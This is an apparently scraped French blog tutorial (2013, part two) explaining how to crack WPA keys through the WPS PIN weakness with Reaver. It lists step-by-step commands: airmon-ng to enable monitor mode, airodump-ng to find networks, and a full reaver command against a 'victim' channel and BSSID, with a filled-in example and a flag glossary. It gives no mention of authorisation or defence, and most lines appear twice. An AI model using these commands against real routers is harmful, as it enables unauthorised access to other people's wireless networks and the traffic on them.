reaver pour cle wpa wps(2eme partie application) - tuto-informatique.seb30.overblog.com
Overblog
Editer l'article Suivre ce blog Administration + Créer mon blog
tuto-informatique.seb30.overblog.com

tuto et astuce informatique,n'hesitez pas a faire un don pour le travail

reaver pour cle wpa wps(2eme partie application)

Publié le 25 Novembre 2013 par SEB in backtrack

pour voir si reaver est installé taper reaver dans votre terminal ,cette page vous montrera toutes les options possible avec reaver

pour voir si reaver est installé taper reaver dans votre terminal ,cette page vous montrera toutes les options possible avec reaver

pour mettre votre carte en monitoring ouvrez votre terminal et tapez ceci    airmon-ng start wlan0

pour mettre votre carte en monitoring ouvrez votre terminal et tapez ceci airmon-ng start wlan0

ensuite afin de detecter les reseaux tapez ceci      airodump-ng mon0

ensuite afin de detecter les reseaux tapez ceci airodump-ng mon0

pour lancer l application veuillez tapez ceci      reaver -i mon0 -f -c (numero du canal) -b (bssid) -vv -x 60

pour lancer l application veuillez tapez ceci reaver -i mon0 -f -c (numero du canal) -b (bssid) -vv -x 60

exemple :reaver -i mon0 -f -c 11 -b 98:F8:21:4B:AC:46 -vv -x 60

vous n avez plus qu a laisser l application tourner ca peux aller vite comme ca peux mettre des heures

-i carte en monitoring

-f pour desactiver le saut du canal

-c canal de la victime

-b bssid de la victime

-vv verbose afficher avertissement non critique

-x définir le temps de dormir après 10 échec inattendu

Commenter cet article